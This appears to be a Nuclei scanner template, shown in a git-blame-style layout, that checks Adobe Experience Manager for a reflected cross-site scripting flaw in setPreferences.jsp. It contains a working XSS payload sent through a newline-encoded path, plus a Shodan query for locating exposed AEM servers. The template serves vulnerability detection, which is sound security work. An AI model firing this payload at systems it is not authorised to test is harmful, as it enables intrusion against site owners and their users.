2021-12-04 12:02:37 +00:00
|
|
|
id: aem-setpreferences-xss
|
|
|
|
|
|
|
|
info:
|
2022-09-16 19:50:10 +00:00
|
|
|
name: Adobe Experience Manager - Cross-Site Scripting
|
2021-12-04 12:02:37 +00:00
|
|
|
author: zinminphy0,dhiyaneshDK
|
2022-09-16 19:50:10 +00:00
|
|
|
severity: high
|
|
|
|
description: Adobe Experience Manager contains a cross-site scripting vulnerability via setPreferences.
|
2021-12-04 12:02:37 +00:00
|
|
|
reference:
|
|
|
|
- https://www.youtube.com/watch?v=VwLSUHNhrOw&t=142s
|
|
|
|
- https://github.com/projectdiscovery/nuclei-templates/issues/3225
|
|
|
|
- https://twitter.com/zin_min_phyo/status/1465394815042916352
|
2022-09-16 19:50:10 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
|
|
|
cvss-score: 7.2
|
|
|
|
cwe-id: CWE-79
|
2022-07-25 17:37:15 +00:00
|
|
|
metadata:
|
2023-04-28 08:11:21 +00:00
|
|
|
max-request: 2
|
2022-07-25 17:37:15 +00:00
|
|
|
shodan-query: http.component:"Adobe Experience Manager"
|
2023-06-02 23:20:49 +00:00
|
|
|
tags: aem,xss,misconfig
|
2021-12-04 12:02:37 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-12-04 12:02:37 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=<svg/onload=confirm(document.domain);>//a"
|
|
|
|
- "{{BaseURL}}/content/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=<svg/onload=confirm(document.domain);>//a"
|
|
|
|
|
|
|
|
stop-at-first-match: true
|
2023-10-14 11:27:55 +00:00
|
|
|
|
2021-12-04 12:02:37 +00:00
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "<svg/onload=confirm(document.domain);>"
|
|
|
|
- 'A JSONObject text must begin with'
|
|
|
|
condition: and
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
2022-05-13 20:26:43 +00:00
|
|
|
- 400
|
2023-10-20 11:41:13 +00:00
|
|
|
|
|
|
|
# digest: 4b0a004830460221009d0a7da71d28923e5d3e956e788d5473a2da74757694503c2848cafbc566b452022100a96856cc860157c008e6568d2d8938a3f0b0f7b6253a3d6a87a8ad67d36cf06f:922c64590222798bb761d5b6d8e72950
|